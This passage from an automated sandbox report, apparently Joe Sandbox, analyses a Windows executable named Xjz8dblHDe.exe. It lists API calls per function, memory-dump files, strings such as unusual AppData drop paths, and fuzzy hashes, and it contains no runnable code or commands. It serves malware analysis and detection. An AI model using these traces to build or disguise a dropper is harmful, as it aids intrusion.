                                                                    • Instruction Fuzzy Hash: 0AA002754455409FDF015B50EF048057A61B7E5741B61C469A25551074C7354461EB19
                                                                    Function 00401F06 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 004052FF: lstrlenW.KERNEL32(halituses,00000000,?,759223A0,?,?,?,?,?,?,?,?,?,00403257,00000000,?), ref: 00405337
                                                                      • Part of subcall function 004052FF: lstrlenW.KERNEL32(00403257,halituses,00000000,?,759223A0,?,?,?,?,?,?,?,?,?,00403257,00000000), ref: 00405347
                                                                      • Part of subcall function 004052FF: lstrcatW.KERNEL32(halituses,00403257,00403257,halituses,00000000,?,759223A0), ref: 0040535A
                                                                      • Part of subcall function 004052FF: SetWindowTextW.USER32(halituses,halituses), ref: 0040536C
                                                                      • Part of subcall function 004052FF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405392
                                                                      • Part of subcall function 004052FF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053AC
                                                                      • Part of subcall function 004052FF: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053BA
                                                                      • Part of subcall function 00405880: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F28,Error launching installer), ref: 004058A9
                                                                      • Part of subcall function 00405880: CloseHandle.KERNEL32(?), ref: 004058B6
                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?), ref: 00401F4D
                                                                      • Part of subcall function 00406722: WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401F01,?,?,?,?,?,?), ref: 00406733
                                                                      • Part of subcall function 00406722: GetExitCodeProcess.KERNEL32(?,?), ref: 00406755
                                                                      • Part of subcall function 004061DE: wsprintfW.USER32 ref: 004061EB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                    • String ID:
                                                                    • API String ID: 2972824698-0
                                                                    • Opcode ID: 716e4bcc1b8b9f2027449172acbc8f1de255482e8a371654dbc69d7b5ce7f032
                                                                    • Instruction ID: 1848912924f12909307f0f16d051c5eef0c325367a6f8932b55625d14ee19b35
                                                                    • Opcode Fuzzy Hash: 716e4bcc1b8b9f2027449172acbc8f1de255482e8a371654dbc69d7b5ce7f032
                                                                    • Instruction Fuzzy Hash: 96F09032906021DBCB20FBA19D845DF76A4EF40358B2441BBF902B61D1CB7C4E519BAE

                                                                    Non-executed Functions

                                                                    Function 00404C7B Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003F9), ref: 00404C93
                                                                    • GetDlgItem.USER32(?,00000408), ref: 00404C9E
                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404CE8
                                                                    • LoadBitmapW.USER32(0000006E), ref: 00404CFB
                                                                    • SetWindowLongW.USER32(?,000000FC,00405273), ref: 00404D14
                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D28
                                                                    • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D3A
                                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 00404D50
                                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D5C
                                                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D6E
                                                                    • DeleteObject.GDI32(00000000), ref: 00404D71
                                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D9C
                                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404DA8
                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E3E
                                                                    • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E69
                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E7D
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00404EAC
                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EBA
                                                                    • ShowWindow.USER32(?,00000005), ref: 00404ECB
                                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FC8
                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040502D
                                                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405042
                                                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405066
                                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405086
                                                                    • ImageList_Destroy.COMCTL32(00000000), ref: 0040509B
                                                                    • GlobalFree.KERNEL32(00000000), ref: 004050AB
                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405124
                                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 004051CD
                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051DC
                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 004051FC
                                                                    • ShowWindow.USER32(?,00000000), ref: 0040524A
                                                                    • GetDlgItem.USER32(?,000003FE), ref: 00405255
                                                                    • ShowWindow.USER32(00000000), ref: 0040525C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                    • String ID: $M$N
                                                                    • API String ID: 1638840714-813528018
                                                                    • Opcode ID: 7bba4bc50886af6ee4f9e8a9478083b1cbee84b53dc979653cd125d1348ee930
                                                                    • Instruction ID: 9d148378a915bf423124f05431c6d1c5c5454a8af56f3bee09cc42272145c63f
                                                                    • Opcode Fuzzy Hash: 7bba4bc50886af6ee4f9e8a9478083b1cbee84b53dc979653cd125d1348ee930
                                                                    • Instruction Fuzzy Hash: 59026EB0900209EFEB109F54DD85AAE7BB9FB85314F10817AF610BA2E1D7799E41CF58
                                                                    Function 004046FF Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003FB), ref: 0040474E
                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00404778
                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00404829
                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00404834
                                                                    • lstrcmpiW.KERNEL32(: Completed,007A1F20,00000000,?,?), ref: 00404866
                                                                    • lstrcatW.KERNEL32(?,: Completed), ref: 00404872
                                                                    • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404884
                                                                      • Part of subcall function 004058E1: GetDlgItemTextW.USER32(?,?,00000400,004048BB), ref: 004058F4
                                                                      • Part of subcall function 0040652B: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Xjz8dblHDe.exe",00403347,C:\Users\user\AppData\Local\Temp\,75923420,004035B6,?,00000006,00000008,0000000A), ref: 0040658E
                                                                      • Part of subcall function 0040652B: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040659D
                                                                      • Part of subcall function 0040652B: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Xjz8dblHDe.exe",00403347,C:\Users\user\AppData\Local\Temp\,75923420,004035B6,?,00000006,00000008,0000000A), ref: 004065A2
                                                                      • Part of subcall function 0040652B: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Xjz8dblHDe.exe",00403347,C:\Users\user\AppData\Local\Temp\,75923420,004035B6,?,00000006,00000008,0000000A), ref: 004065B5
                                                                    • GetDiskFreeSpaceW.KERNEL32(0079FEF0,?,?,0000040F,?,0079FEF0,0079FEF0,?,00000001,0079FEF0,?,?,000003FB,?), ref: 00404947
                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404962
                                                                      • Part of subcall function 00404ABB: lstrlenW.KERNEL32(007A1F20,007A1F20,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B5C
                                                                      • Part of subcall function 00404ABB: wsprintfW.USER32 ref: 00404B65
                                                                      • Part of subcall function 00404ABB: SetDlgItemTextW.USER32(?,007A1F20), ref: 00404B78
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                    • String ID: : Completed$A$C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen
                                                                    • API String ID: 2624150263-2682436269
                                                                    • Opcode ID: 52b5712f2dd952f907a64875e1ccc77d7d09b953cf269de9d4a5e95fdb35a845
                                                                    • Instruction ID: d6689dd06746f62e3dccefeeeb603cce7d7bc9c76077680089f181f5c68842d6
                                                                    • Opcode Fuzzy Hash: 52b5712f2dd952f907a64875e1ccc77d7d09b953cf269de9d4a5e95fdb35a845
                                                                    • Instruction Fuzzy Hash: DFA190F1900209ABDB11AFA5CD41AAFB7B8EF85304F10843BF611B62D1D77C99418B6D
                                                                    Function 00402104 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                                                    Strings
                                                                    • C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Resultatopgrelses186, xrefs: 004021C3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: CreateInstance
                                                                    • String ID: C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Resultatopgrelses186
                                                                    • API String ID: 542301482-644401023
                                                                    • Opcode ID: 47d0b6cfbb01b3f03f9c85bf81605092c369e934b5dec228f075aa53eaa66100
                                                                    • Instruction ID: 8dfa29a236a07f1275cc6a79af1154fb3a8ffb17113c9066b1df84c51f017d98
                                                                    • Opcode Fuzzy Hash: 47d0b6cfbb01b3f03f9c85bf81605092c369e934b5dec228f075aa53eaa66100
                                                                    • Instruction Fuzzy Hash: 4F413A71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E1DBB99981CB54
                                                                    Function 004043CD Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 204windowstringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040446B
                                                                    • GetDlgItem.USER32(?,000003E8), ref: 0040447F
                                                                    • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040449C
                                                                    • GetSysColor.USER32(?), ref: 004044AD
                                                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044BB
                                                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044C9
                                                                    • lstrlenW.KERNEL32(?), ref: 004044CE
                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044DB
                                                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044F0
                                                                    • GetDlgItem.USER32(?,0000040A), ref: 00404549
                                                                    • SendMessageW.USER32(00000000), ref: 00404550
                                                                    • GetDlgItem.USER32(?,000003E8), ref: 0040457B
                                                                    • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045BE
                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 004045CC
                                                                    • SetCursor.USER32(00000000), ref: 004045CF
                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 004045E8
                                                                    • SetCursor.USER32(00000000), ref: 004045EB
                                                                    • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040461A
                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040462C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                    • String ID: : Completed$DC@$N
                                                                    • API String ID: 3103080414-907034273
                                                                    • Opcode ID: 2da216cdb10da56fdc38759a2ba284d26a9c8f7b49192765219d3b76b1da507d
                                                                    • Instruction ID: 7c305bb631aa8564409a9791ba7e53f932479190766108f73685c8e55a50eb1d
                                                                    • Opcode Fuzzy Hash: 2da216cdb10da56fdc38759a2ba284d26a9c8f7b49192765219d3b76b1da507d
                                                                    • Instruction Fuzzy Hash: 3B61A0B1900209BFDF10AF60DD45AAA7B69FB85344F00843AF701B61E0D77DA951CF98
                                                                    Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                                    • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                    • DrawTextW.USER32(00000000,007A7A20,000000FF,00000010,00000820), ref: 00401156
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                    • String ID: F
                                                                    • API String ID: 941294808-1304234792
                                                                    • Opcode ID: 218f2c87b148b58c94c6785b51cf5afc075c1faf60bc5df3e6f759b2377d660f
                                                                    • Instruction ID: 0958fbfe94b1809001ec2c76305b3cf500f7264b01c73c256976ee1787a3906e
                                                                    • Opcode Fuzzy Hash: 218f2c87b148b58c94c6785b51cf5afc075c1faf60bc5df3e6f759b2377d660f
                                                                    • Instruction Fuzzy Hash: B1418C71800209AFCF058F95DE459AF7BB9FF45310F00842AF591AA1A0CB38D954DFA4
                                                                    Function 00405EE3 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040607E,?,?), ref: 00405F1E
                                                                    • GetShortPathNameW.KERNEL32(?,007A55C0,00000400), ref: 00405F27
                                                                      • Part of subcall function 00405CF2: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D02
                                                                      • Part of subcall function 00405CF2: lstrlenA.KERNEL32(00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D34
                                                                    • GetShortPathNameW.KERNEL32(?,007A5DC0,00000400), ref: 00405F44
                                                                    • wsprintfA.USER32 ref: 00405F62
                                                                    • GetFileSize.KERNEL32(00000000,00000000,007A5DC0,C0000000,00000004,007A5DC0,?,?,?,?,?), ref: 00405F9D
                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405FAC
                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FE4
                                                                    • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,007A51C0,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 0040603A
                                                                    • GlobalFree.KERNEL32(00000000), ref: 0040604B
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406052
                                                                      • Part of subcall function 00405D8D: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\Xjz8dblHDe.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D91
                                                                      • Part of subcall function 00405D8D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DB3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
